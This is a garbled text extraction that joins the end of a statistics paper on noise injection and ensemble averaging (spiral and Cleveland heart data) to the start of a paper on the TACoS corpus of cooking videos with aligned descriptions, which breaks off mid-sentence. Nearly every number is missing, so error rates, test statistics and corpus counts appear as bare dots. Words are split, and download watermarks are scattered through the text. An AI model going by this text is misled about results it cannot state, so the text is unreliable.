ne, we present results of noise injection into zero weight-d ecay, op tim al architecture (figure ) and sho w that even under a low- cap acity architecture, w eight decay is essential to stabilize the system . o ptim al resu lts are p resented in f igure . w ith optim al w eight decay and architecture, addition of noise achieves results w hich are better than any other network, and better than logistic regression . m ean error of logistic regression was . . , m ean error for zero-no ise net w as . . and m ean erro r fo r noise w ith sd . was . . . the diffe rence b etween the op tim al neural network and logistic regression is statistically signi® cant (t . , df , f igure . r esults for the op tim al arch itecture network . left: classi® cation error. r ight: r o c values. n oise injection is h elpful and overall perform ance is optim al. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise p , . ; z . , p , . ) and the differen ce to zero noise is signi® cant as well (t . , df , p , . ; z . , p , . ). t o our knowledge, these are the best resu lts on the c leveland h eart data. . d iscussion t he motivation to our ap proach com es fro m a key obse rvatio n regarding the bias/varian ce decom po sition of prediction error, nam ely the fac t that ensem ble averag ing does not affe ct the b ias portion of the error, b ut reduces the varian ce, wh en the estim ators on w hich averaging is done are independent. th e level of noise affe cts the independency betw een the training sets, and thus the relative im p rovem ent of ensem ble averag ing. h owever, the level of noise also affec ts the quality of each predictor separately, increasing its varian ce by increasing the variab ility in the data. th us, there sho uld b e an optim al level of the noise (it m ay not correspo nd to the true noise), which leads to optimal ensemb le p erfo rm ance. t his p erform ance can be fu rther im proved if the varian ce of individual networks can b e tem pered, e.g. with weight decay. w e have dem onstrated the effe ct of noise injection on prediction in three differen t cases. (i) h ighly non-linear (sp iral) data, usin g a non-appro priate m odel (as the data are alm ost rad ially sym m etric and the neural net is not). this required the use of an ensem ble of high capacity sin gle predictors and thus m ade the regularization task challenging. it w as show n that the excess varian ce of high cap acity m odels could only be effec tively trim m ed b y a com bination of all three com po nents: w eight decay, noise injection and ensem ble averag ing. (ii) h ighly non-lin ear (spiral) data with essen tially the p erfect m odel for it (g a m w ith locally linear units). even in this case, w here regularization pro vides the perfect bias to the m odel, perform ance could be im pro ved by the comb ination. (iii) a highly linear prob lem , wh ere prac tically any network has excess capacity. t his case is a representative of a fam ily of clinical data sets, in which (linear) variab le selection was ap plied to h ighly dim ensional data and resulted in a highly linear low- dim ensional data structure. it was thus challenging to b e ab le to sh ow that the b en algorithm is useful in this case, and can lead to im pro ved classi® cation results. p erform ance was also evalu ated based on the r o c m easure, as it is a stan dard m odel com parison tool fo r clinical data analysis. t he theoretical analysis su ggests that it is best to start with a very ¯ exible fu nction ap proxim ation techniq ue (e.g. a feedfo rw ard network with a large num ber of hidden units) and then control its capacity and sm oothness using noise and averag ing. o ur conclusio ns are not restricted to arti® cial neural network esti- m ation. w e sho w that sim ilar conclusions can be obtained when using a h ighly ¯ exib le g a m (h astie & tibsh iran i, ). a cknow led gem ents stim ulating discussion s with leo b reim an, b rian r ipley and chris b ishop are gratefully acknowledged. n otes . an exam ple of an identi® able m odel is (logistic) regression. . w here v ar ( f ) is de® ned by e x [( f x ( x ) e x [ f x ( x )]) ]. d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator . in this case, the model amounts to a sum of locally linear functions around each of the training sam ples. . v a m edical c enter, l ong beach and c leveland c linic foundation. . recent best result of . % on non-norm alized data was obtained by a com pany that provides classi® cation w ith its ow n proprietary software (u d m , ). . this is a classical problem in clinical data in which variable selection w as done by a linear m ethod and therefore the data contains m ostly variables with linear structure. . this is a standard use; see, for exam ple, results under the statl o g e sprit project (brazdil & henery, ). . http://www.stat.cm u.edu. . to read the boxplot: the white line in the m iddle of the box represents the m edian of the distribution; the grey box represents the inter-quartile range such that the bottom of the box is the ® rst quartile and the top is the third quartile; the dashed line and its terminating line represent plus and m inus . inter-quartile distance from the m edian; points lying outside this range are considered outliers, each such point is represented by a w hisker. . c an be obtained from m urphy and aha ( ). r eferences baum , e. & lang, k. ( ) c onstructing hidden units using exam ples and queries. in r. p. l ippm ann, j. e . m oody & d . s. touretzky (e ds), advances in n eural information processing systems, v ol. . san m ateo, c a: m organ kaufmann, pp. ± . bishop, c .m . ( ) training w ith noise is equivalent to tikhonov regularization. n eural c omputation, , ± . brazdil, p. & henery, r. ( ) analysis of results. in d . m ichie, d . j. spiegelhalter & c . c . taylor (e ds), m achine learning, n eural and statistical c lassi® cation. n ew york: ellis h orwood, pp. ± . breim an, l. ( ) bagging predictors. technical report tr- , d epartm ent of statistics, u niversity of c alifornia, berkeley, c a. d effuant, g . ( ) an algorithm for building regularized, piecewise linear discrimination surfaces: the perceptron m embrane. n eural computation , , ± . d etrano, r. ( ) accuracy curves: an alternative graphical representation of probability data. journal of clinical epidem iology, , ± . d etrano, r., janosi, a., steinbru nn, w ., p ® sterer, m ., schm id, j., sandhu, s., guppy, k ., lee, s. & froelicher, v. ( ) international application of a new probability algorithm for the diagnosis of coronary artery disease. am erican journal of c ardiology, , ± . e fron, b. & tibshirani, r. ( ) an introduction to the bootstrap. n ew york: c hapm an and h all. fahlm an, s.e . ( ) fast-learn ing variations on back-propagation: an empirical study. in d . t ouretzky, g . h inton & t. sejnow ski (e ds), proceedings of the connectionist m odels summ er school. san m ateo, c a: m organ k aufmann, pp. ± . fahlm an, s.e. & lebiere, c . ( ) the cascade-c orrelation l earning architectu re. c m u-cs- - , c arnegie m ellon u niversity, pittsburgh, pa. g em an, s., bienenstock, e . & d oursat, r. ( ) n eural networks and the bias-variance dilem m a. n eural c omputation, , ± . g ennari, j.h ., l angley, p. & fisher, d . ( ) m odels of incremental concept formation. arti® cial intelligence, , ± . g oodenough, d .j., rossm ann, k . & l usted, l.b. ( ) radiographic applications of receiver operating characteristic (ro c ) curves. radiology, , ± . hanley, j.a. & m cn eil, b.j. ( ) the m eaning and use of the area under a receiver operating characteristic (ro c ) curve. radiology, , ± . hansen, l.k . & salamon, p. ( ) n eural networks ensem bles. ieee transactions on pattern analysis and m achine intelligence, , ± . hastie, t. & tibshirani, r. ( ) generalized additive m odels. statistica l science , , ± . hastie, t. & tibshirani, r. ( ) generalized a dditive m odels. london: c hapm an and h all. henderson, a.r. ( ) assessin g test accuracy and its clinical consequences: a prim er for receiver operating characteristic curve analysis. annals of c linical biochem istry, , ± . hoaglin, d .c ., m osteller, f. & t ukey, j.w . ( ) u nderstand ing r obust and exploratory d ata analysis. n ew york: w iley. hogg, r.v. & c raig, a.t. ( ) introduction to m athem atical statistics ( rd edn). t oronto, c anada: m acm illan. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise k rogh, a. & h ertz, j.a. ( ) a sim ple weight decay can improve generalization. in j. e. m oody, s. j. hanson & r. p. lippmann (eds), advances in n eural information processing systems, vol. . san m ateo, c a: m organ k aufm ann, pp. ± . l ang, k .j. & w itbrock, m .j. ( ) learning to tell two spirals apart. in d . s. touretzky, j. l . e llman, t . j. sejnowski & g. e. hin ton (e ds), p roceedings of the connectionists m odels, pp. ± . l ehm ann, e.l. ( ) n onparametrics: statistical m ethods based on ranks. san francisco, c a: h olden and d ay. l ippm ann, r.p., k ukolich, l . & shahian, d . ( ) predicting the risk of com plications in coronary artery bypass operations using neural networks. in g. t esauro, d . touretzky & t. l een (eds), a dvances in n eural information p rocessing system s, v ol. . c ambridge, m a: m it press, pp. ± . m urphy, p.m . & aha, d .w . ( ) uc i repository of m achine learning databases. d epartment of information and c om puter science, u niversity of c alifornia at irvine. perrone, m .p. ( ) improving regression estim ation: averagin g m ethods for variance reduction with extension s to general c onvex m easure optim ization. phd thesis, brow n u niversity, institute for brain and n eural systems, providence, ri. ripley, b.d . ( ) pattern recognition and n eural n etworks. o xford press. sietsma, j. & d ow, r.j.f. ( ) c reating arti® cial neural netw orks that generalize. n eural networks, , ± . stensmo, m . ( ) adaptive autom ated diagnosis. phd thesis, royal institute of technology, stockholm , sw eden. u ltragem d ata m ining (u d m ) ( ) esprit statlog benchm arks. technical report, boulder c reek, c a. w olpert, d .h . ( ) stacked generalization. n eural n etworks, , ± . a pp end ix a: the sp ira l d ata t he two-dim ensional spiral data (lang & w itbrock, ) are given b y a vector ( x i , y i ) de® ned by: x i r i cos ( a i k p / ), y i r i sin ( a i k p / ) (a ) wh ere a i p i / , r i . i / , i , . . . , (a ) and k fo r one class and fo r the other class. a pp end ix b: d etails a nd pre-pro cessing of the c le velan d h eart d a ta t he data in the u c i repo sitory contain variab les out of abo ut that were in the original study. t he task is to predict the existence of a coronary artery disease (c ad ) based on the m easurem ents. d ata fo r p atients were obtained; % of the patients were diagnosed with c a d . t he variabl e attributes are: ( ) a ge ( ) sex ( ) chest p ain typ e ( valu esÐ converted to binary variab les) ( ) resting bloo d pressu re ( ) serum cholesterol in m g dl ( ) fasting bloo d su gar . m g dl ( ) resting electrocardiograp hic resu lts (values , , ) ( ) m axim um h eart rate achieved ( ) exercise-induced angina ( ) oldpeak st depressio n induced b y exercise relative to rest d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator ( ) the slo pe of the peak exercise st segm ent (converted to binary variab les) ( ) n um b er of m ajor vesse ls ( ± ) coloured by ¯ ouroscopy (converted to binary variables) ( ) thal: norm al; ® xed defect; reversible defect (converted to binary variables) w e h ave added dum m y variab les to replace the categorial and ordinal variab les fo r variab les , , and and therefore w orked with independent variab les. t he continuous variabl es , , , and were sph ered (standard ized) by setting the m ean of each of the variabl es to zero w ith unit varian ce. this step was necessary as the data contain variab les that are on differen t scales, su ch as age and bloo d pressu re. the original data contain attributes and h ave m any m issing valu es. the data used in most of the b enchmarks have only attributes and a fe w m issin g valu es wh ich we sim p ly replaced by their unconditional expectations. th e addition of dumm y variab les and data sp hering had a dram atic effe ct on the classi® cation resu lts. d ow nl oa de d by [ ] a t : s ep te m be r transactions of the association for computational linguistics, ( ) – . action editor: hal daumé iii. submitted / ; published / . c© association for computational linguistics. grounding action descriptions in videos michaela regneri ∗, marcus rohrbach �, dominikus wetzel ∗, stefan thater ∗, bernt schiele � and manfred pinkal ∗ ∗ department of computational linguistics, saarland university, saarbrücken, germany (regneri|dwetzel|stth|pinkal)@coli.uni-saarland.de � max planck institute for informatics, saarbrücken, germany (rohrbach|schiele)@mpi-inf.mpg.de abstract recent work has shown that the integration of visual information into text-based models can substantially improve model predictions, but so far only visual information extracted from static images has been used. in this paper, we consider the problem of grounding sentences describing actions in visual information ex- tracted from videos. we present a general purpose corpus that aligns high quality videos with multiple natural language descriptions of the actions portrayed in the videos, together with an annotation of how similar the action descriptions are to each other. experimental results demonstrate that a text-based model of similarity between actions improves substan- tially when combined with visual information from videos depicting the described actions. introduction the estimation of semantic similarity between words and phrases is a basic task in computational semantics. vector-space models of meaning are one standard approach. following the distributional hy- pothesis, frequencies of context words are recorded in vectors, and semantic similarity is computed as a proximity measure in the underlying vector space. such distributional models are attractive because they are conceptually simple, easy to implement and relevant for various nlp tasks (turney and pan- tel, ). at the same time, they provide a sub- stantially incomplete picture of word meaning, since they ignore the relation between language and extra- linguistic information, which is constitutive for lin- guistic meaning. in the last few years, a growing amount of work has been devoted to the task of grounding meaning in visual information, in par- ticular by extending the distributional approach to jointly cover texts and images (feng and lapata, ; bruni et al., ). as a clear result, visual information improves the quality of distributional models. bruni et al. ( ) show that visual infor- mation drawn from images is particularly relevant for concrete common nouns and adjectives. a natural next step is to integrate visual infor- mation from videos into a semantic model of event and action verbs. psychological studies have shown the connection between action semantics and videos (glenberg, ; howell et al., ), but to our knowledge, we are the first to provide a suitable data source and to implement such a model. the contribution of this paper is three-fold: • we present a multimodal corpus containing textual descriptions aligned with high-quality videos. starting from the video corpus of rohrbach et al. ( b), which contains high- resolution video recordings of basic cooking tasks, we collected multiple textual descrip- tions of each video via mechanical turk. we also provide an accurate sentence-level align- ment of the descriptions with their respective videos. we expect the corpus to be a valu- able resource for computational semantics, and moreover helpful for a variety of purposes, in- cluding video understanding and generation of text from videos. • we provide a gold-standard dataset for the evaluation of similarity models for action verbs and phrases. the dataset has been designed as analogous to the usage similarity dataset of erk et al. ( ) and contains pairs of natural- language action descriptions plus their associ- ated video segments. each of the pairs is an- notated with a similarity score based on several manual annotations. • we report an experiment on similarity model- ing of action descriptions based on the video corpus and the gold standard annotation, which demonstrates the impact of scene information from videos. visual similarity models outper- form text-based models; the performance of combined models approaches the upper bound indicated by inter-annotator agreement. the paper is structured as follows: we first place ourselves in the landscape of related work (sec. ), then we introduce our corpus (sec. ). sec. re- ports our action similarity annotation experiment and sec. introduces the similarity measures we ap- ply to the annotated data. we outline the results of our evaluation in sec. , and conclude the paper with a summary and directions for future work (sec. ). related work a large multimodal resource combining language and visual information resulted from the esp game (von ahn and dabbish, ). the dataset contains many images tagged with several one-word labels. the microsoft video description corpus (chen and dolan, , msvd) is a resource providing textual descriptions of videos. it consists of multiple crowd-sourced textual descriptions of short video snippets. the msvd corpus is much larger than our corpus, but most of the videos are of relatively low quality and therefore too challenging for state-of- the-art video processing to extract relevant informa- tion. the videos are typically short and summarized with a single sentence. our corpus contains coher- ent textual descriptions of longer video sequences, where each sentence is associated with a timeframe. gupta et al. ( ) present another useful re- source: their model learns the alignment of predicate-argument structures with videos and uses the result for action recognition in videos. however, the corpus contains no natural language texts. the connection between natural language sen- tences and videos has so far been mostly explored by the computer vision community, where dif- ferent methods for improving action recognition by exploiting linguistic data have been proposed (gupta and mooney, ; motwani and mooney, ; cour et al., ; tzoukermann et al., ; rohrbach et al., b, among others). our resource is intended to be used for action recognition as well, but in this paper, we focus on the inverse effect of visual data on language processing. feng and lapata ( ) were the first to enrich topic models for newspaper articles with visual in- formation, by incorporating features from article il- lustrations. they achieve better results when in- corporating the visual information, providing an en- riched model that pairs a single text with a picture. bruni et al. ( ) used the esp game data to cre- ate a visually grounded semantic model. their re- sults outperform purely text-based models using vi- sual information from pictures for the task of mod- eling noun similarities. they model single words, and mostly visual features lead only to moderate im- provements, which might be due to the mixed qual- ity and random choice of the images. dodge et al. ( ) recently investigated which words can actu- ally be grounded in images at all, producing an au- tomatic classifier for visual words. an interesting in-depth study by mathe et al. ( ) automatically learnt the semantics of motion verbs as abstract features from videos. the study captures actions with - videos for each of the actions, and would need a perfect object recognition from a visual classifier to scale up. steyvers ( ) and later silberer and lapata ( ) present an alternative approach to incorpo- rating visual information directly: they use so-called feature norms, which consist of human associations for many given words, as a proxy for general percep- tual information. because this model is trained and evaluated on those feature norms, it is not directly comparable to our approach. the restaurant game by orkin and roy ( ) grounds written chat dialogues in actions carried out in a computer game. while this work is outstanding from the social learning perspective, the actions that ground the dialogues are clicks on a screen rather than real-world actions. the dataset has successfully been used to model determiner meaning (reckman et al., ) in the context of the restaurant game, but it is unclear how this approach could scale up to content words and other domains. the tacos corpus we build our corpus on top of the “mpii cook- ing composite activities” video corpus (rohrbach et al., b, mpii composites), which contains videos of different activities in the cooking domain, e.g., preparing carrots or separating eggs. we ex- tend the existing corpus with multiple textual de- scriptions collected by crowd-sourcing via amazon mechanical turk (mturk). to facilitate the align- ment of sentences describing activities with their proper video segments, we also obtained approxi- mate timestamps, as described in sec. . . mpii composites comes with timed gold- standard annotation of low-level activities and par- ticipating objects (e.g. open [hand,drawer] or take out [hand,knife,drawer]). by adding textual descriptions (e.g., the person takes a knife from the drawer) and aligning them on the sentence level with videos and low-level annotations, we pro- vide a rich multimodal resource (cf. fig. ), the “saarbrücken corpus of textually annotated cook- ing scenes” (tacos). in particular, the tacos cor- pus provides: • a collection of coherent textual descrip- tions for video recordings of activities of medium complexity, as as a basis for empiri- cal discourse-related research, e.g., the selec- tion and granularity of action descriptions in context • a high-quality alignment of sentences with video segments, supporting the grounding of action descriptions in visual information • collections of paraphrases describing the same scene, which result as a by-product from the text-video alignment and can be useful for text generation from videos (among other things) • the alignment of textual activity descriptions with sequences of low-level activities, which may be used to study the decomposition of ac- tion verbs into basic activity predicates mturk.com we expect that our corpus will encourage and en- able future work on various topics in natural lan- guage and video processing. in this paper, we will make use of the second aspect only, demonstrating the usefulness of the corpus for the grounding task. after a more detailed description of the basic video corpus and its annotation (sec. . ) we de- scribe the collection of textual descriptions with mturk (sec. . ), and finally show the assembly and some benchmarks of the final corpus (sec. . ). . the video corpus mpii composites contains high resolution video recordings of - minutes length ( . min. on av- erage). basic cooking tasks such as cutting a cu- cumber were recorded, each between and times. the selection of cooking tasks is based on those pro- posed at “jamie’s home cooking skills”. the cor- pus is recorded in a kitchen environment with a total of subjects. each video depicts a single task exe- cuted by an individual subject. the dataset contains expert annotations of low- level activity tags. annotations are provided for seg- ments containing a semantically meaningful cook- ing related movement pattern. the action must go beyond single body part movements (such as move arm up) and must have the goal of changing the state or location of an object. different activity labels are used for annotation (e.g. peel, stir, trash). each low-level activity tag consists of an activity label (peel), a set of associated objects (carrot, drawer,...), and the associated timeframe (start- ing and ending points of the activity). associated objects are the participants of an activity, namely tools (e.g. knife), patient (carrot) and location (cutting-board). we provide the coarse-grained role information for patient, location and tool in the corpus data, but we did not use this information in our experiments. the dataset contains a total of annotated segments, on average per video. . collecting textual video descriptions we collected textual descriptions for a subset of the videos in mpii composites, restricting collection to tasks that involve manipulation of cooking ingredi- ents. we also excluded tasks with fewer than four www.jamieshomecookingskills.com video recordings in the corpus, leaving tasks to be described. we randomly selected five videos from each task, except the three tasks for which only four videos are available. this resulted in a total of videos. for each video, we collected different textual descriptions, leading to annotation as- signments. we published these assignments (hits) on mturk, using an adapted version of the annota- tion tool vatic (vondrick et al., ). in each assignment, the subject saw one video specified with the task title (e.g. how to prepare an onion), and then was asked to enter at least five and at most complete english sentences to describe the events in the video. the annotation instructions contained example annotations from a kitchen task not contained in our actual dataset. annotators were encouraged to watch each video several times, skipping backward and forward as they wished. they were also asked to take notes while watching, and to sketch the annotation before entering it. once familiarized with the video, sub- jects did the final annotation by watching the entire video from beginning to end, without the possibil- ity of further non-sequential viewing. subjects were asked to enter each sentence as soon as the action de- scribed by the sentence was completed. the video playback paused automatically at the beginning of the sentence input. we recorded pause onset for each sentence annotation as an approximate ending timestamp of the described action. the annotators resumed the video manually. the tasks required a hit approval rate of % and were open only to workers in the us, in order to increase the general language quality of the en- glish annotations. each task paid . usd. before paying we randomly inspected the annotations and manually checked for quality. the total costs of col- lecting the annotations amounted to , usd. the data was obtained within a time frame of . weeks. . putting the tacos corpus together our corpus is a combination of the mturk data and mpii composites, created by filtering out inappro- priate material and computing a high-quality align- ment of sentences and video segments. the align- ment is done by matching the approximate times- github.com/marcovzla/vatic/tree/bolt l l l l s l s s s s s el em en ta ry ti m ef ra m es sentences l l l l l figure : aligning action descriptions with the video. tamps of the mturk data to the accurate timestamps in mpii composites. we discarded text instances if people did not time the sentences properly, taking the association of sev- eral (or even all) sentences to a single timestamp as an indicator. whenever we found a timestamp asso- ciated with two or more sentences, we discarded the whole instance. overall, we had to filter out % of the text instances, which left us with textual video descriptions. for the alignment of sentence annotations and video segments, we assign a precise timeframe to each sentence in the following way: we take the timeframes given by the low-level annotation in mpii composites as a gold standard micro-event segmentation of the video, because they mark all distinct frames that contain activities of interest. we call them elementary frames. the sequence of el- ementary frames is not necessarily continuous, be- cause idle time is not annotated. the mturk sentences have end points that con- stitute a coarse-grained, noisy video segmentation, assuming that each sentence spans the time between the end of the previous sentence and its own end- ing point. we refine those noisy timeframes to gold frames as shown in fig. : each elementary frame (l -l ) is mapped to a sentence (s -s ) if its noisy timeframe covers at least half of the elementary frame. we define the final gold sentence frame then as the timespan between the starting point of the first and the ending point of the last elementary frame. the alignment of descriptions with low-level ac- tivities results in a table as given in fig. . columns contain the textual descriptions of the videos; rows top verbs cut, take, get, put, wash, place, rinse, remove, *pan, peel top activities move, take out, cut, wash, take apart, add, shake, screw, put in, peel figure : most frequent verbs and low-level actions in the tacos corpus. pan is probably often mis-tagged. correspond to low-level actions, and each sentence is aligned with the last of its associated low-level ac- tions. as a side effect, we also obtain multiple para- phrases for each sentence, by considering all sen- tences with the same associated time frame as equiv- alent realizations of the same action. the corpus contains , action descrip- tions (tokens), realizing , different sentences (types). it consists of , words (tokens), , of which are content word instances (i.e. nouns, verbs and adjectives). the verb vocabulary comprises , verb tokens, realizing lem- mas. since verbs occurring in the corpus typically describe actions, we can note that the linguistic vari- ance for the different low-level activities is quite large. fig. gives an impression of the action re- alizations in the corpus, listing the most frequent verbs from the textual data, and the most frequent low-level activities. on average, each description covers . low-level activities, which indicates a clear difference in gran- ularity. % of the descriptions correspond to ex- actly one low-level activity, about a quarter ( %) covers two of them; % have or more low-level elements, % more than . the corpus shows how humans vary the granularity of their descriptions, measured in time or number of low-level activities, and it shows how they vary the linguistic realization of the same action. for example, fig. contains dice and chop into small pieces as alternative realizations of the low-level activity sequence slice - scratch off - slice. the descriptions are of varying length ( words on average), reaching from two-word phrases to de- tailed descriptions of words. most sentences are short, consisting of a reference to the person in the video, a participant and an action verb (the person rinses the carrot, he cuts off the two edges). people often specified an instrument (from the faucet), or the resulting state of the action (chop the carrots in small pieces). occasionally, we find more complex constructions (support verbs, coordinations). as fig. indicates, the timestamp-based align- ment is pretty accurate; occasional errors occur like he starts chopping the carrot... in nl sequence . the data contains some typos and ungrammatical sentences (he washed carrot), but for our own ex- periments, the small number of such errors did not lead to any processing problems. the action similarity dataset in this section, we present a gold standard dataset, as a basis for the evaluation of visually grounded models of action similarity. we call it the “action similarity dataset” (asim) in analogy to the usage similarity dataset (usim) of erk et al. ( ) and erk et al. ( ). similarly to usim, asim con- tains a collection of sentence pairs with numerical similarity scores assigned by human annotators. we asked the annotators to focus on the similarity of the activities described rather than on assessing seman- tic similarity in general. we use sentences from the tacos corpus and record their timestamps. thus each sentence comes with the video segment which it describes (these were not shown to the annotators). . selecting action description pairs random selection of annotated sentences from the corpus would lead to a large majority of pairs which are completely dissimilar, or difficult to grade (e.g., he opens the drawer – the person cuts off the ends of the carrot). we constrained the selection pro- cess in two ways: first, we consider only sentences describing activities of manipulating an ingredient. the low-level annotation of the video corpus helps us identify candidate descriptions. we exclude rare and special activities, ending up with cut, slice, chop, peel, take apart, and wash, which oc- cur reasonably frequently, with a wide distribution over different scenarios. we restrict the candidate set to those sentences whose timespan includes one of these activities. this results in a conceptually more focussed repertoire of descriptions, and at the same time admits full linguistic variation (wash an apple under the faucet – rinse an apple, slice the cucumber – cut the cucumber into slices). - wash [hand,carrot] - shake [hand,carrot] - close [hand,drawer] - take out [hand,knife,drawer] - move [hand,cutting board,counter] - move [hand,carrot,bowl,cutting board] - cut [knife,carrot,cutting board] - slice [knife,carrot,cutting board] > : the man takes out a cutting board. > : he washes a carrot. > : he takes out a knife. > : he slices the carrot. videos of basic kitchen tasks low level annotations with timestamps, actions and objects natural language descriptions with ending times of the actions manual low-level annotation mechanical turk data collection timestamp-based alignment figure : corpus overview sample frame start end action participants nl sequence nl sequence nl sequence wash hand, carrot he washed carrot the person rinses the carrot. he rinses the carrot from the faucet. cut knife, carrot, cutting board he cut off ends of carrots the person cuts off the ends of the carrot. he cuts off the two edges. open hand, drawer close hand, drawer he searches for some- thing in the drawer, failed attempt, he throws away the edges in trash. trash hand, carrot the person searches for the trash can, then throws the ends of the carrot away. wash hand, carrot he rinses the carrot again. shake hand, carrot he washed carrot the person rinses the carrot again. he starts chopping the carrot in small pieces. slice knife, carrot, cutting board scratch off hand, carrot, knife, cutting board slice knife, carrot, cutting board he diced carrots he finished chopping the carrots in small pieces. figure : excerpt from the corpus for a video on preparing a carrot. example frames, low-level annotation (action and participants) is shown along with three of the mturk sequences (nl sequence - ). second, we required the pairs to share some lexi- cal material, either the head verb or the manipulated ingredient (or both). more precisely, we composed the asim dataset from three different subsets: different activity, same object: this subset con- tains pairs describing different types of actions car- ried out on the same type of object (e.g. the man washes the carrot. – she dices the carrot.). its fo- cus is on the central task of modeling the semantic relation between actions (rather than the objects in- volved in the activity), since the object head nouns in the descriptions are the same, and the respective video segments show the same type of object. same activity, same object: description pairs of this subset will in many cases, but not always, agree in their head verbs. the dataset is useful for explor- ing the degree to which action descriptions are un- derspecified with respect to the precise manner of their practical realization. for example, peeling an onion will mostly be done in a rather uniform way, while cut applied to carrot can mean that the carrot is chopped up, or sliced, or cut in halves. same activity & verb, different object: descrip- tion pairs in this subset share head verb and low- level activity, but have different objects (e.g. the man washes the carrot. – a girl washes an apple un- der the faucet.). this dataset enables the exploration of the objects’ meaning contribution to the complete action, established by the variation of equivalent ac- tions that are done to different objects. we assembled action description pairs for anno- tation: pairs share the object; of which have different activities, and the other pairs share the same activity. we included paraphrases describing the same video segment, but we excluded pairs of identical sentences. additional pairs share their head verb, but have different objects. . manual annotation three native speakers of english were asked to judge the similarity of the action pairs with respect to how we refer to the latter with the term object; we don’t require the ingredient term to be the actual grammatical object in the action descriptions, we rather use “object” in its semantic role sense as the entity affected by an action. part of gold standard sim σ ρ diff. activity, same object . . . same activity, same object . . . all with same object . . . same verb, diff. object . . . complete dataset . . . figure : average similarity ratings (sim), their standard deviation (σ)) and annotator agreement (ρ) for asim. they are carried out, rating each sentence pair with a score from (not similar at all) to (the same or nearly the same). they did not see the respective videos, but we noted the relevant kitchen task (i.e. which vegetable was prepared). we asked the an- notators explicitly to ignore the actor of the action (e.g. whether it is a man or a woman) and score the similarities of the underlying actions rather than their verbalizations. each subject rated all pairs, which were shown to them in completely random or- der, with a different order for each subject. we compute inter-annotator agreement (and the forthcoming evaluation scores) using spearman’s rank correlation coefficient (ρ), a non-parametric test which is widely used for similar evaluation tasks (mitchell and lapata, ; bruni et al., ; erk and mccarthy, ). spearman’s ρ evaluates how the samples are ranked relative to each other rather than the numerical distance between the rankings. fig. shows the average similarity ratings in the different settings and the inter-annotator agreement. the average inter-rater agreement was ρ = . (av- eraged over pairwise rater agreements), with pair- wise results of ρ = . , . , and . , respec- tively, which are all highly significant at p < . . as expected, pairs with the same activity and ob- ject are rated very similar ( . ) on average, while the similarity of different activities on the same ob- ject is the lowest ( . ). for both subsets, inter-rater agreement is high (ρ = . ), and even higher for both same object subsets together ( . ). pairs with identical head verbs and different ob- jects have a small standard deviation, at . . the inter-annotator agreement on this set is much lower than for pairs from the same object set. this indi- cates that similarity assessment for different variants of the same activity is a hard task even for humans. models of action similarity in the following, we demonstrate that visual infor- mation contained in videos of the kind provided by the tacos corpus (sec. ) substantially contributes to the semantic modeling of action-denoting expres- sions. in sec. , we evaluate several methods for predicting action similarity on the task provided by the asim dataset. in this section, we describe the models considered in the evaluation. we use two different models based on visual information, and in addition two text based models. we will also explore the effect of combining linguistic and visual infor- mation and investigate which mode is most suitable for which kinds of similarity. . text-based models we use two different models of textual similarity to predict action similarity: a simple word-overlap measure (jaccard coefficient) and a state-of-the-art model based on “contextualized” vector representa- tions of word meaning (thater et al., ). jaccard coefficient. the jaccard coefficient gives the ratio between the number of (distinct) words common to two input sentences and the total num- ber of (distinct) words in the two sentences. such simple surface-oriented measures of textual similar- ity are often used as baselines in related tasks such as recognizing textual entailment (dagan et al., ) and are known to deliver relatively strong results. vector model. we use the vector model of thater et al. ( ), which “contextualizes” vector repre- sentations for individual words based on the particu- lar sentence context in which the target word occurs. the basic intuition behind this approach is that the words in the syntactic context of the target word in a given input sentence can be used to refine or disam- biguate its vector. intuitively, this allows us to dis- criminate between different actions that a verb can refer to, based on the different objects of the action. we first experimented with a version of this vec- tor model which predicts action similarity scores of two input sentences by computing the cosine simi- larity of the contextualized vectors of the verbs in the two sentences only. we achieved better performance with a variant of this model which computes vectors for the two sentences by summing over the contex- tualized vectors of all constituent content words. in the experiments reported below, we only use the second variant. we use the same experimental setup as thater et al. ( ), as well as the parameter settings that are reported to work best in that paper. . video-based models we distinguish two approaches to compute the sim- ilarity between two video segments. in the first, un- supervised approach we extract a video descriptor and compute similarities between these raw features (wang et al., ). the second approach builds upon the first by additionally learning higher level attribute classifiers (rohrbach et al., b) on a held out training set. the similarity between two segments is then computed between the classifier re- sponses. in the following we detail both approaches: raw visual features. we use the state-of-the-art video descriptor dense trajectories (wang et al., ) which extracts visual video features, namely histograms of oriented gradients, flow, and motion boundary histograms, around densely sampled and tracked points. this approach is especially suited for this data as it ignores non-moving parts in the video: we are interested in activities and manipulation of objects, and this type of feature implicitly uses only infor- mation in relevant image locations. for our setting this feature representation has been shown to be su- perior to human pose-based approaches (rohrbach et al., a). using a bag-of-words representation we encode the features using a , dimensional codebook. features and codebook are provided with the publicly available video dataset. we compute the similarity between two encoded features by computing the intersection of the two (normalized) histograms. visual classifiers. visual raw features tend to have several dimensions in the feature space which pro- vide unreliable, noisy values and thus degrade the strength of the similarity measure. intermediate level attribute classifiers can learn which feature di- mensions are distinctive and thus significantly im- prove performance over raw features. rohrbach et al. ( b) showed that using such an attribute clas- sifier representation can significantly improve per- model same object same verb overall t e x t jaccard . . . textual vectors . . . text combined . . . v id e o visual raw vectors . - . . visual classifier . . . video combined . - . . m ix all unsupervised . . . all combined . . . upper bound . . . figure : evaluation results in spearman’s ρ. all values > . are significant at p < . . formance for composite activity recognition. the relevant attributes are all activities and objects an- notated in the video data (cf. section . ). for the experiments reported below we use the same setup as rohrbach et al. ( b) and use all videos in mpii composites and mpii cooking (rohrbach et al., a), excluding the videos used during evaluation. the real-valued svm-classifier output provides a confidence how likely a certain attribute appeared in a given video segment. this results in a -dimensional vector of classifier outputs for each video segment. to compute the similarity between two vectors we compute the cosine between them. evaluation we evaluate the different similarity models intro- duced in sec. by calculating their correlation with the gold-standard similarity annotations of asim (cf. sec. ). for all correlations, we use spear- man’s ρ as a measure. we consider the two textual measures (jaccard and textual vectors) and their combination, as well as the two visual mod- els (visual raw vectors and visual clas- sifier) and their combination. we also combined textual and visual features, in two variants: the first includes all models (all combined), the sec- ond only the unsupervised components, omitting the visual classifier (all unsupervised). to com- bine multiple similarity measures, we simply aver- age their normalized scores (using z-scores). figure shows the scores for all of these mea- sures on the complete asim dataset (overall), along with the two subparts, where description pairs share either the object (same object) or the head verb (same verb). in addition to the model re- sults, the table also shows the average human inter- annotator agreement as upper bound. on the complete set, 